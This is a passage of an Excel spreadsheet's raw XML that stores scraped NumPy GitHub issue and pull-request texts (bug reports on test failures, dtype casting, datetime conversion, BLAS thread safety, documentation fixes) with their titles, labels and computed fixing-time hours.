self = &lt;numpy.core.tests.test_multiarray.TestNewBufferProtocol object at 0xf041f20c&gt;_x000D_
_x000D_
    def test_error_too_many_dims(self):_x000D_
        def make_ctype(shape, scalar_type):_x000D_
            t = scalar_type_x000D_
            for dim in shape[::-1]:_x000D_
                t = dim * t_x000D_
            return t_x000D_
    _x000D_
        # construct a memoryview with 33 dimensions_x000D_
        c_u8_33d = make_ctype((1,)*33, ctypes.c_uint8)_x000D_
        m = memoryview(c_u8_33d())_x000D_
        assert_equal(m.ndim, 33)_x000D_
    _x000D_
        assert_raises_regex(_x000D_
            RuntimeError, "ndim",_x000D_
&gt;           np.array, m)_x000D_
_x000D_
c_u8_33d   = &lt;class 'numpy.core.tests.test_multiarray.c_ubyte_Array_1_Array_1_Array_1_Array...ay_1_Array_1_Array_1_Array_1_Array_1_Array_1_Array_1_Array_1_Array_1__Array_1'&gt;_x000D_
m          = &lt;memory at 0xf2da0e3c&gt;_x000D_
make_ctype = &lt;function make_ctype at 0xf041cb1c&gt;_x000D_
self       = &lt;numpy.core.tests.test_multiarray.TestNewBufferProtocol object at 0xf041f20c&gt;_x000D_
_x000D_
/venv/local/lib/python2.7/site-packages/numpy/core/tests/test_multiarray.py:6534: _x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
_x000D_
self = &lt;numpy.testing._private.utils._Dummy testMethod=nop&gt;_x000D_
expected_exception = &lt;type 'exceptions.RuntimeError'&gt;, expected_regexp = 'ndim'_x000D_
callable_obj = &lt;built-in function array&gt;, args = (&lt;memory at 0xf2da0e3c&gt;,)_x000D_
kwargs = {}, context = &lt;unittest.case._AssertRaisesContext object at 0xf041ff2c&gt;_x000D_
_x000D_
    def assertRaisesRegexp(self, expected_exception, expected_regexp,_x000D_
                           callable_obj=None, *args, **kwargs):_x000D_
        """Asserts that the message in a raised exception matches a regexp._x000D_
    _x000D_
            Args:_x000D_
                expected_exception: Exception class expected to be raised._x000D_
                expected_regexp: Regexp (re pattern object or string) expected_x000D_
                        to be found in error message._x000D_
                callable_obj: Function to be called._x000D_
                args: Extra args._x000D_
                kwargs: Extra kwargs._x000D_
            """_x000D_
        context = _AssertRaisesContext(expected_exception, self, expected_regexp)_x000D_
        if callable_obj is None:_x000D_
            return context_x000D_
        with context:_x000D_
&gt;           callable_obj(*args, **kwargs)_x000D_
E           ValueError: '(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)&lt;B' is not a valid PEP 3118 buffer format string_x000D_
_x000D_
args       = (&lt;memory at 0xf2da0e3c&gt;,)_x000D_
callable_obj = &lt;built-in function array&gt;_x000D_
context    = &lt;unittest.case._AssertRaisesContext object at 0xf041ff2c&gt;_x000D_
expected_exception = &lt;type 'exceptions.RuntimeError'&gt;_x000D_
expected_regexp = 'ndim'_x000D_
kwargs     = {}_x000D_
self       = &lt;numpy.testing._private.utils._Dummy testMethod=nop&gt;_x000D_
```_x000D_
_x000D_
Only for 32-bit Unicode Python 2.7: https://travis-ci.org/MacPython/numpy-wheels/builds/380655679_x000D_
_x000D_
Error present at commit db552b5b6 "Merge pull request #10996 from adeak/docfix-stringio-unicode" (23 days ago).  _x000D_
_x000D_
Not present at commit b5c1bcf1e "Merge pull request #10891 from eric-wieser/assert-no-cycles" (25 days ago): https://travis-ci.org/MacPython/numpy-wheels/builds/370054701_x000D_
_x000D_
In `git log b5c1bcf1e..db552b5b6` I noticed references to #10971 and #10882 which both mention buffers - are they relevant? </t>
  </si>
  <si>
    <t>Test failures TestNewBufferProtocol.test_error_too_many_dims</t>
  </si>
  <si>
    <t>I found while writing a ufunc that takes structured dtypes for its inputs that casting of essentially everything is allowed to a structured dtype, which is surprising. This is reflected in `can_cast`:_x000D_
```_x000D_
np.can_cast('f8', 'u1')_x000D_
# False_x000D_
np.can_cast('f8', '2u1')_x000D_
# True_x000D_
```_x000D_
I would have expected, at least for `safe`, that casting would only be allowed if the dtypes were the same (or, perhaps, that `can_cast` was applied recursively).</t>
  </si>
  <si>
    <t>BUG? anything is allowed to cast to structured dtypes?</t>
  </si>
  <si>
    <t>The [documentation for `np.ma.masked_values()`](https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.ma.masked_values.html) explains the role of the `shrink` option (which defaults to True) as follows:_x000D_
_x000D_
&gt; Whether to collapse a mask full of False to nomask._x000D_
_x000D_
In Numpy &lt;= 1.13.3, this works correctly:_x000D_
_x000D_
```_x000D_
$ python -c 'import numpy as np; print(repr(np.ma.masked_values(np.arange(10.0), -1)))'_x000D_
masked_array(data = [ 0.  1.  2.  3.  4.  5.  6.  7.  8.  9.],_x000D_
             mask = False,_x000D_
       fill_value = -1.0)_x000D_
```_x000D_
_x000D_
In Numpy &gt;= 1.14.0 and on master, it is broken:_x000D_
_x000D_
```_x000D_
$ python -c 'import numpy as np; print(repr(np.ma.masked_values(np.arange(10.0), -1)))'_x000D_
masked_array(data=[0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0],_x000D_
             mask=[False, False, False, False, False, False, False, False,_x000D_
                   False, False],_x000D_
       fill_value=-1.0)_x000D_
```</t>
  </si>
  <si>
    <t>Regression: np.ma.masked_values(..., shrink=True) no longer works</t>
  </si>
  <si>
    <t xml:space="preserve">I'm using a Raspberry Pi Zero W and I am running Raspian Stretch Lite, released 2018-04-18, with update and dist-upgrade (on 17 May 2018). In python3 I've tried:_x000D_
&gt; pip3 install numpy_x000D_
which installed 1.14.3. When I import numpy in python3 it reports that it cannot file "libf77blas.so.3". numpy 1.12.1 works._x000D_
_x000D_
Didn't find any other comments on this, sorry if it is a duplicate._x000D_
</t>
  </si>
  <si>
    <t>numpy 1.14.3 can't open libf77blas.so.3 on Raspberry Pi Zero W (arm6)</t>
  </si>
  <si>
    <t>['53 - Invalid', '57 - Close?', 'component: build']</t>
  </si>
  <si>
    <t>I work alot with memory views and from time to time it happens to me that I accidentaly do something which changes the array memory address, like._x000D_
For example in my quite extensive program including a memory view at a point before the array has been "fully" defined (for example by appending lines) happens quite often, since there are so many lines of code that I sometimes forget after which point in the code the array unchanged._x000D_
What I thought to be a nice addition to numpy to avoid problems like this, was a flag to set to receive a warning/error when trying to perform operations on an array, which could change the memory address and would thus interfere with memory views._x000D_
Is that feasible?</t>
  </si>
  <si>
    <t>No warning when changing array memory address</t>
  </si>
  <si>
    <t xml:space="preserve">```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; import datetime_x000D_
&gt;&gt;&gt; print(np.array([datetime.datetime(2018, 5, 15, 6, 0),datetime.datetime(2018, 5, 15, 6, 30)]).astype('datetime64[us]'))_x000D_
&gt;&gt;&gt; print(np.array([datetime.datetime(2018, 5, 15, 6, 0),datetime.datetime(2018, 5, 15, 6, 30)]).astype('datetime64'))_x000D_
['2018-05-15T06:00:00.000000' '2018-05-15T06:30:00.000000']_x000D_
['2018-05-15' '2018-05-15']_x000D_
```_x000D_
_x000D_
shows that without specifying the unit, conversion from datetime.datetime object to numpy.datetime64 reduces the actual accuracy of initial data and there is no obvious reason why this should take place. Also, specifying units is not needed when converting directly from iso8601 strings, as snown in https://docs.scipy.org/doc/numpy-1.14.0/reference/arrays.datetime.html_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.array(['2001-01-01T12:00', '2002-02-03T13:56:03.172'], dtype='datetime64')_x000D_
array(['2001-01-01T12:00:00.000-0600', '2002-02-03T13:56:03.172-0600'], dtype='datetime64[ms]')_x000D_
```_x000D_
_x000D_
Tested with numpy 1.14.3 from Anaconda python 3.6.3 </t>
  </si>
  <si>
    <t>Converting from datetime.datetime returns date without time</t>
  </si>
  <si>
    <t xml:space="preserve">This is a less ambitious version of #8714, as I proposed in [this comment](https://github.com/numpy/numpy/pull/8714#discussion_r104186276)_x000D_
_x000D_
Essentially, this limits the function to the obvious broadcasting cases when the indices and array have the same number of dimensions. This is sufficiently powerful that any other broadcasting behavior can be achieved by inserting extra dimensions, but keeps to:_x000D_
_x000D_
&gt; [In the face of ambiguity, refuse the temptation to guess.](https://zen-of-python.info/in-the-face-of-ambiguity-refuse-the-temptation-to-guess.html#12)_x000D_
_x000D_
An expansion of these functions is given in their docstring (using the format adopted by #9946), but the one-line summaries are:_x000D_
_x000D_
* put:  `out[ii + s_[j,] + kk] = a[ii + s_[:,] + kk][indices[ii + s_[j,] + kk]]`_x000D_
* take: `a[ii + s_[:,] + kk][indices[ii + s_[j,] + kk]] = values[ii + s_[j,] + kk]`_x000D_
_x000D_
Or perhaps more clearly in terms of basic indexing only:_x000D_
_x000D_
* put:  `out[ii + s_[j,] + kk] = a[ii + s_[indices[ii + s_[j,] + kk],] + kk]`_x000D_
* take: `a[ii + s_[indices[ii + s_[j,] + kk],] + kk] = values[ii + s_[j,] + kk]`_x000D_
</t>
  </si>
  <si>
    <t>ENH: Add (put|take)_along_axis</t>
  </si>
  <si>
    <t>Fixes #11103 for 1.14.4 using a quick hack, which will be superseded by #10444 on master (1.15)._x000D_
_x000D_
The quick fix is to use the OS printf to print the value. The downside is it does not properly respect the uniqueness, padding, and other arguments for dragon4 printing, but at least it prints the right value now. (This means it fails a few printing unit tests on ppc)._x000D_
_x000D_
Output on the OSUOSL ppc64be system:_x000D_
```python_x000D_
&gt;&gt;&gt; np.arange(3, dtype=np.float128)_x000D_
array([0., 1., 2.], dtype=float128)_x000D_
&gt;&gt;&gt; np.array([10000.0, 1.0, 1.234], dtype=np.float128)_x000D_
array([1.00000000e+04, 1.00000000e+00, 1.23400000e+00], dtype=float128)_x000D_
_x000D_
&gt;&gt;&gt; np.sqrt(np.array([2.], dtype=np.float128))_x000D_
array([1.41421356], dtype=float128)_x000D_
&gt;&gt;&gt; np.set_printoptions(precision=30)_x000D_
&gt;&gt;&gt; np.sqrt(np.array([2.], dtype=np.float128))_x000D_
array([1.41421356237309504880168872421], dtype=float128)_x000D_
```</t>
  </si>
  <si>
    <t>BUG: str of DOUBLE_DOUBLE format wrong on ppc64</t>
  </si>
  <si>
    <t>On some Debian platforms, numpy.arange does not work properly. For example, on arm64 I get:_x000D_
_x000D_
```_x000D_
Python 3.6.5 (default, May 11 2018, 13:30:17) _x000D_
[GCC 7.3.0] on linux_x000D_
&gt;&gt;&gt; import numpy_x000D_
&gt;&gt;&gt; numpy.arange(3)_x000D_
array([0, 1, 2])_x000D_
&gt;&gt;&gt; numpy.arange(3, dtype=numpy.float128)_x000D_
array([0., 0., 0.], dtype=float128)_x000D_
```_x000D_
_x000D_
This causes a failure of the astropy tests, reported in astropy/astropy#7467. It is a regression; for 1.13 it worked fine._x000D_
_x000D_
Affected platforms include arm64, ppc64 (big and little endian), s390x, risc64v._x000D_
This is also reported as Debian bug [#898776](https://bugs.debian.org/898776).</t>
  </si>
  <si>
    <t>1.14.3: numpy.arange(dtype=numpy.float128) does not work on some platforms</t>
  </si>
  <si>
    <t>~This is a single commit from #11018, to try to find the reason for the travis build failure.~_x000D_
_x000D_
EDIT: this is a split-off of #11018, just implementing `keepdims`, to keep discussion more clearly separate.</t>
  </si>
  <si>
    <t>ENH: Add keepdims argument for generalized ufuncs.</t>
  </si>
  <si>
    <t>Fixes #11096_x000D_
_x000D_
This existing logic (dating back seven years to Mark Weibe's original commit) seems to have an off-by-one error, and also omitted the base case -- which I think left `us_meta.base` undefined._x000D_
_x000D_
~~TODO: add a regression test for this, if possible.~~ Done.</t>
  </si>
  <si>
    <t>BUG: fix datetime.timedelta-&gt;timedelta64 unit detection logic</t>
  </si>
  <si>
    <t>Several refactorings and simplifications of einsum's argument parsing. Makes some progress towards #10801.</t>
  </si>
  <si>
    <t>MAINT: Einsum argument parsing cleanup</t>
  </si>
  <si>
    <t>Add documentation for `numpy.lib.format` by adding an `autosummary` section for it, a template that only reproduces the `docstring`. Then reference that module in the other parts of the documentation._x000D_
_x000D_
Replaces PR #11085, #11082. It seems I did not do "make clean" before testing those locally.</t>
  </si>
  <si>
    <t>DOC: add numpy.lib.format to docs and link to it</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11031 _x000D_
_x000D_
(Fix suggested by @eric-wieser at https://github.com/numpy/numpy/pull/10763#discussion_r185397259)_x000D_
_x000D_
The bug is that floating point types were printed to the terminal with extra quote marks, but only in the python2 interactive shell and when stdout is a "real" file. This was due to weird old behavior in py2 related to `tp_print` I didn't correctly account for before._x000D_
</t>
  </si>
  <si>
    <t>BUG: Python2 doubles don't print correctly in interactive shell</t>
  </si>
  <si>
    <t>See #7741_x000D_
_x000D_
The C version of Einsum did not support values 26-52 to be used as index beforehand - it does now.</t>
  </si>
  <si>
    <t>BUG: Added support for index values 27-52 in C einsum</t>
  </si>
  <si>
    <t>~~WIP, I am still working out what is going on here, but it appears that it is faster to build all files than to check which files need to be rebuilt.~~_x000D_
_x000D_
~~Putting this on github to see how it affects the CI build times.~~_x000D_
_x000D_
Edit: See below, this PR now just properly cleans up `_configtest.o.d` so that it does not keep expanding in size after every build.</t>
  </si>
  <si>
    <t>BLD: cleanup `_configtest.o.d` during build</t>
  </si>
  <si>
    <t>Hello,_x000D_
when building numpy 1.14.3 on debian for sparc64 architecture, the test suite fails with:_x000D_
_x000D_
```_x000D_
numpy.core.tests.test_multiarray.TestMatmul.test_shapes ... ok_x000D_
numpy.core.tests.test_multiarray.TestMatmul.test_vector_matrix_values ... ok_x000D_
numpy.core.tests.test_multiarray.TestMatmul.test_vector_vector_values ... ok_x000D_
numpy.core.tests.test_multiarray.TestMemEventHook.test_mem_seteventhook ... ok_x000D_
numpy.core.tests.test_multiarray.TestMethods.test__complex__ ... ok_x000D_
numpy.core.tests.test_multiarray.TestMethods.test__complex__should_not_work ... Bus error_x000D_
```_x000D_
_x000D_
(this is for python 2.7.15~rc1)_x000D_
_x000D_
full log at: https://buildd.debian.org/status/fetch.php?pkg=python-numpy&amp;arch=sparc64&amp;ver=1%3A1.14.3-2&amp;stamp=1525577504&amp;raw=0_x000D_
_x000D_
can you have a look? thanks!</t>
  </si>
  <si>
    <t>1.14.3 on sparc64: numpy.core.tests.test_multiarray.TestMethods.test__complex__should_not_work ... Bus error</t>
  </si>
  <si>
    <t>Fixes #11072 by documenting when we will return uninitialized values, according to the text agreed upon in the issue</t>
  </si>
  <si>
    <t>DOC: Mention we can return unitinitialized values</t>
  </si>
  <si>
    <t>continuation of PR #11082, this time with a true label and ref</t>
  </si>
  <si>
    <t>DOC: create label and ref, fixes broken link</t>
  </si>
  <si>
    <t>Fixes #10821, and minimally edit the referenced page to mention `pytest` alternatives in each section where it is relevant._x000D_
_x000D_
Make some progress with #10856 "update documentation". Should I add a "deprecated" note to the different `numpy/testing/_private/decorators.py` functions as well, and note the `pytest` alternatives?</t>
  </si>
  <si>
    <t>DOC: link to TESTS.rst.txt testing guidelines, tweak testing docs.</t>
  </si>
  <si>
    <t>another step in issue #10856, let's see if tests pass</t>
  </si>
  <si>
    <t>ENH: remove nose from travis tests</t>
  </si>
  <si>
    <t>Fixes #11080 by refering to `numpy.lib.format` not `nep-0001`_x000D_
_x000D_
A search for similar problems yielded only the documentation of `__array_ufunc__` in [`numpy.lib.mixins`](http://www.numpy.org/devdocs/reference/generated/numpy.lib.mixins.NDArrayOperatorsMixin.html), but I do not think there is an internal alternative</t>
  </si>
  <si>
    <t>DOC: link to updated module docstring, not NEP</t>
  </si>
  <si>
    <t xml:space="preserve">The [documentation](https://docs.scipy.org/doc/numpy/neps/npy-format.html#format-specification-version-1-0) of the format contains the following paragraph:_x000D_
_x000D_
&gt; "The next HEADER_LEN bytes form the header data describing the array’s format. It is an ASCII string which contains a Python literal expression of a dictionary. It is terminated by a newline (‘n’) and padded with spaces (‘x20’) to make the total length of the magic string + 4 + HEADER_LEN be evenly divisible by **16** for alignment purposes."_x000D_
_x000D_
In the code comments (and in the actual format), padding is done such that the sum of the length of the magic string, 4, and the HEADER_LEN, is evenly divisible by **64**, not 16, as shown [here](https://github.com/numpy/numpy/blob/master/numpy/lib/format.py#L105): _x000D_
_x000D_
This has caused me some headache while writing a custom .npy serializer.._x000D_
_x000D_
Also, the wording "to make the total length of the magic string + 4 + HEADER_LEN" is a little confusing, as it makes it seem that the amount being referenced is equal to `total length of magic string` + `4` + `HEADER_LEN` as opposed to total length of `magic string + 4 + HEADER_LEN`._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: Fix mistake in documentation of `*.npy` header.</t>
  </si>
  <si>
    <t>Improve shuffle performance for C-contiguous arrays of any dimension</t>
  </si>
  <si>
    <t>MAINT: Improve shuffle performance in common case</t>
  </si>
  <si>
    <t xml:space="preserve">Resolves #11075
&lt;!-- Reviewable:start --&gt;
---
This change is [&lt;img src="https://reviewable.io/review_button.svg" height="34" align="absmiddle" alt="Reviewable"/&gt;](https://reviewable.io/reviews/numpy/numpy/11076)
&lt;!-- Reviewable:end --&gt;
</t>
  </si>
  <si>
    <t>BUG: Ensure `PyArray_AssignRawScalar` respects `NPY_NEEDS_INIT`</t>
  </si>
  <si>
    <t xml:space="preserve">In PR #11036 new functions were added. There was at least one documentation mistake and [a comment](https://github.com/numpy/numpy/pull/11036#pullrequestreview-118975952) indicating a need to expand how to use the new functions_x000D_
</t>
  </si>
  <si>
    <t>DOC: expand reasoning behind npy_*floatstatus_barrer()</t>
  </si>
  <si>
    <t>Related to #11024 _x000D_
_x000D_
Before I start mucking around in the source code, I thought I'd try to draft a few unit tests for the behavior we'd expect for a "simple" mixture of datetime and float input to `histogramdd`._x000D_
_x000D_
Naturally, datetime work can be a bit tricky; perhaps the most obvious issue that came up as I was drafting the unit test -- for datetime bin edges, is there an unambiguously clear "winner" in terms of a robust way to take i.e., "days" (or whatever datetime object the user provides) and "cast" it to a unit (like microseconds since the epoch) that can easily be subdivided for the various bin edge division scenarios?</t>
  </si>
  <si>
    <t>[WIP] ENH: Improve mixed edge type handling by histogramdd</t>
  </si>
  <si>
    <t>['01 - Enhancement', '55 - Needs work', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>The previous OSX Accelerate/vecLib code in distutils/system_info was hardcoded for unclear reasons, in particular in a way that it was always preferred over generic BLAS/LAPACK with no way to disable it._x000D_
_x000D_
Clean this up (also removes the code duplication), and make it possible to disable OSX Accelerate altogether. (Which would be handy for this for https://github.com/scipy/scipy/pull/8670 --- in the meantime, we'll however need to workaround it.)_x000D_
_x000D_
I cannot actually test this code myself, so would be useful to have some OSX user step up and try it out.</t>
  </si>
  <si>
    <t>MAINT: `distutils.system_info`: handle Accelerate like any other library</t>
  </si>
  <si>
    <t xml:space="preserve">This fixes what looks like a typo, and should add ufunc support for many other functions in the module. </t>
  </si>
  <si>
    <t>BUG?: Adds ufunc support to the linalg module</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: Minor documentation improvements </t>
  </si>
  <si>
    <t xml:space="preserve">The discussion of issue #9028 yielded two different possible directions for allowing `ndarray` subclasses to override `__matmul__` via `__array_ufunc__`. This is option 2 - wrapping the non-ufunc `__matmul__` implementation in a way that respects the `__array_ufunc__` conventions._x000D_
_x000D_
Here is what changed:_x000D_
_x000D_
- added a `ufuncwrapper` class that is meant to be used as a decorator, the class itself is implemented in C but the `__call__` method is in python for now. Its use is shown in `test_wrapper`, which shows how it could be used for a method called `solve`_x000D_
- wrapped `array_matrix_multiply` with the class, and added the tests at the top of the issue to show how the wrapped method checks `__array_ufunc__` before calling `matmul`._x000D_
_x000D_
The wrapper only needs to know `nin` and `nout`, which are parameters to the class initializer._x000D_
_x000D_
Still todo:_x000D_
_x000D_
- [ ]  get feedback about this direction, is it what was asked for? _x000D_
- [ ] move the python-level wrapper into C (make `ufuncwrapper_call` work) and clean up code_x000D_
- [ ] document `ufunc-wrapper`_x000D_
- [ ] add more tests, make sure there are no refcount leaks_x000D_
- [ ] think about edge cases where this will not work, ~~for instance where `None` is a valid return value from `other.__array_ufunc__` (line 397 in number.c)~~ (EDIT: fixed `None` return via tuple)_x000D_
_x000D_
Note the other option is to extend the meaning of ufunc signature so it can do multiple dispatch inside `get_binary_op_function` not only by types but by signature variations as well._x000D_
</t>
  </si>
  <si>
    <t>WIP: ENH: allow __array_ufunc__ to override __matmul__</t>
  </si>
  <si>
    <t>I just added capm to financial.py</t>
  </si>
  <si>
    <t>ENH: Add capm to financial.py</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.lib.financial']</t>
  </si>
  <si>
    <t>Using relative imports prevents running tests stand-alone like_x000D_
```_x000D_
python runtests.py numpy/core/tests/test_longdouble.py_x000D_
```_x000D_
_x000D_
Using absolute imports fixes this.</t>
  </si>
  <si>
    <t>BUG: use absolute imports in test files</t>
  </si>
  <si>
    <t>Use fancy indexing instead of a shuffle to avoid unnecessary_x000D_
object access_x000D_
_x000D_
closes #11013</t>
  </si>
  <si>
    <t>MAINT: Improve performance of random permutation</t>
  </si>
  <si>
    <t>DOC: Add explanation for comments=None in loadtxt.</t>
  </si>
  <si>
    <t>Bump scipy-sphinx-theme to current version._x000D_
_x000D_
This fixes some CSS issues that appear with current sphinx releases and makes copybutton.js work again.</t>
  </si>
  <si>
    <t>DOC: bump scipy-sphinx-theme to current version</t>
  </si>
  <si>
    <t>Fixes #11047.</t>
  </si>
  <si>
    <t>BUG: remove fast scalar power for arrays with object dtype</t>
  </si>
  <si>
    <t xml:space="preserve">`ndarray.__pow__` dispatches to shortcuts for simple powers such as `-1, 0, 0.5, 1, and 2`. As noted by @numpynewb (https://github.com/numpy/numpy/issues/9363#issuecomment-386657349), this is not reasonable for an array with object dtype, and for most exponents, the short-cuts are not used, except for exponent = 2, where `square` is called instead of `pow(.., 2)` for all `dtype`. See  https://github.com/numpy/numpy/blob/b9e3ac9abb6e435cdf6bbe33e0bc894d6a879a53/numpy/core/src/multiarray/number.c#L505_x000D_
</t>
  </si>
  <si>
    <t>BUG: ndarray.__pow__ dispatches to square also for object dtype</t>
  </si>
  <si>
    <t>I'm using numpy (`1.14.1`) linked against OpenBLAS `0.2.18` and it looks like `np.dot`_x000D_
(that uses `dgemm` routine from openblas) is not thread-safe :_x000D_
```python_x000D_
import numpy as np_x000D_
from multiprocessing.pool import ThreadPool_x000D_
_x000D_
dim = 4   # for larger value of dim, there's no issue_x000D_
a = np.arange(10**5 / dim) / 10.**5_x000D_
b = np.arange(10**5).reshape(-1, dim) / 10.**5_x000D_
_x000D_
pp = ThreadPool(4)_x000D_
threaded_result = pp.map(a.dot, [b] * 4) _x000D_
pp.close()_x000D_
pp.terminate()_x000D_
_x000D_
result = a.dot(b)_x000D_
print [np.max(np.abs(x - result)) for x in threaded_result]_x000D_
_x000D_
# print_x000D_
# [1822.7068840452998, 1540.2636287421, 96.10628199050007, 0.0]_x000D_
# or other rather random results whereas it should return zeros_x000D_
```_x000D_
I don't know if this kind of behavior is expected, is it numpy or rather openblas bug ? _x000D_
_x000D_
Note : _x000D_
 * numpy with MKL blas does not have this issue at all_x000D_
 * everything runs fine if openblas threading is turned off (`export OPENBLAS_NUM_THREADS=1`)_x000D_
 * I don't know how to test openblas==0.2.20 version that maybe solves this_x000D_
_x000D_
_x000D_
Some extra info if needed :_x000D_
```_x000D_
Architecture:          x86_64_x000D_
CPU op-mode(s):        32-bit, 64-bit_x000D_
Byte Order:            Little Endian_x000D_
CPU(s):                32_x000D_
On-line CPU(s) list:   0-31_x000D_
Thread(s) per core:    2_x000D_
Core(s) per socket:    8_x000D_
Socket(s):             2_x000D_
NUMA node(s):          2_x000D_
Vendor ID:             GenuineIntel_x000D_
CPU family:            6_x000D_
Model:                 62_x000D_
Model name:            Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz_x000D_
Stepping:              4_x000D_
CPU MHz:               2500.060_x000D_
BogoMIPS:              5000.12_x000D_
Hypervisor vendor:     Xen_x000D_
Virtualization type:   full_x000D_
L1d cache:             32K_x000D_
L1i cache:             32K_x000D_
L2 cache:              256K_x000D_
L3 cache:              25600K_x000D_
NUMA node0 CPU(s):     0-7,16-23_x000D_
NUMA node1 CPU(s):     8-15,24-31_x000D_
Flags:                 fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology eagerfpu pni pclmulqdq ssse3 cx16 pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm retpoline kaiser fsgsbase smep erms xsaveopt_x000D_
```_x000D_
```python_x000D_
np.show_config()_x000D_
lapack_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
    language = c_x000D_
blas_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
    language = c_x000D_
openblas_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
    language = c_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
    language = c_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
```</t>
  </si>
  <si>
    <t>BUG: np.dot is not thread-safe with  OpenBLAS</t>
  </si>
  <si>
    <t>fxing time(hours)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</si>
</sst>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409]yyyy/m/d\ h:mm\ AM/PM;@"/>
  </numFmts>
  <fonts count="2">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2:H2202"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="H1" sqref="H1:H1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.25"/>
  <cols>
    <col min="5" max="5" width="33.75" style="1" customWidth="1"/>
    <col min="6" max="6" width="38.125" style="1" customWidth="1"/>
    <col min="7" max="7" width="42" customWidth="1"/>
    <col min="8" max="8" width="21.875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:8">
      <c r="A2" t="s">
        <v>0</v>
      </c>
      <c r="B2" t="s">
        <v>1</v>
      </c>
      <c r="C2" t="s">
        <v>2</v>
      </c>
      <c r="D2" t="s">
        <v>3</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G2" t="s">
        <v>6</v>
      </c>
      <c r="H2" t="s">
        <v>4825</v>
      </c>
    </row>
    <row r="3" spans="1:8" hidden="1">
      <c r="A3" t="s">
        <v>823</v>
      </c>
      <c r="B3">
        <v>14758</v>
      </c>
      <c r="C3" t="s">
        <v>824</v>
      </c>
      <c r="D3" t="s">
        <v>7</v>
      </c>
      <c r="E3" s="1">
        <v>43760.57744212963</v>
      </c>
      <c r="F3" s="1">
        <v>43762.004733796297</v>
      </c>
      <c r="G3" t="s">
        <v>138</v>
      </c>
      <c r="H3" t="str">
        <f>TEXT(F3-E3,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="4" spans="1:8" hidden="1">
      <c r="A4" t="s">
        <v>773</v>
      </c>
      <c r="B4">
        <v>14744</v>
      </c>
      <c r="C4" t="s">
        <v>825</v>
      </c>
      <c r="D4" t="s">
        <v>7</v>
      </c>
      <c r="E4" s="1">
        <v>43757.768449074072</v>
      </c>
      <c r="F4" s="1">
        <v>43758.169398148151</v>
      </c>
      <c r="G4" t="s">
        <v>118</v>
      </c>
      <c r="H4" t="str">
        <f>TEXT(F4-E4,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="5" spans="1:8" hidden="1">
      <c r="B5">
        <v>14743</v>
      </c>
      <c r="C5" t="s">
        <v>826</v>
      </c>
      <c r="D5" t="s">
        <v>7</v>
      </c>
      <c r="E5" s="1">
        <v>43757.558518518519</v>
      </c>
      <c r="F5" s="1">
        <v>43757.60365740741</v>
      </c>
      <c r="G5" t="s">
        <v>66</v>
      </c>
      <c r="H5" t="str">
        <f>TEXT(F5-E5,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" hidden="1">
      <c r="A6" t="s">
        <v>827</v>
      </c>
      <c r="B6">
        <v>14742</v>
      </c>
      <c r="C6" t="s">
        <v>828</v>
      </c>
      <c r="D6" t="s">
        <v>7</v>
      </c>
      <c r="E6" s="1">
        <v>43756.977847222224</v>
      </c>
      <c r="F6" s="1">
        <v>43758.585509259261</v>
      </c>
      <c r="G6" t="s">
        <v>248</v>
      </c>
      <c r="H6" t="str">
        <f>TEXT(F6-E6,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="7" spans="1:8" hidden="1">
      <c r="A7" t="s">
        <v>829</v>
      </c>
      <c r="B7">
        <v>14737</v>
      </c>
      <c r="C7" t="s">
        <v>830</v>
      </c>
      <c r="D7" t="s">
        <v>7</v>
      </c>
      <c r="E7" s="1">
        <v>43755.887106481481</v>
      </c>
      <c r="F7" s="1">
        <v>43756.363935185182</v>
      </c>
      <c r="G7" t="s">
        <v>831</v>
      </c>
      <c r="H7" t="str">
        <f>TEXT(F7-E7,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="8" spans="1:8" hidden="1">
      <c r="A8" t="s">
        <v>832</v>
      </c>
      <c r="B8">
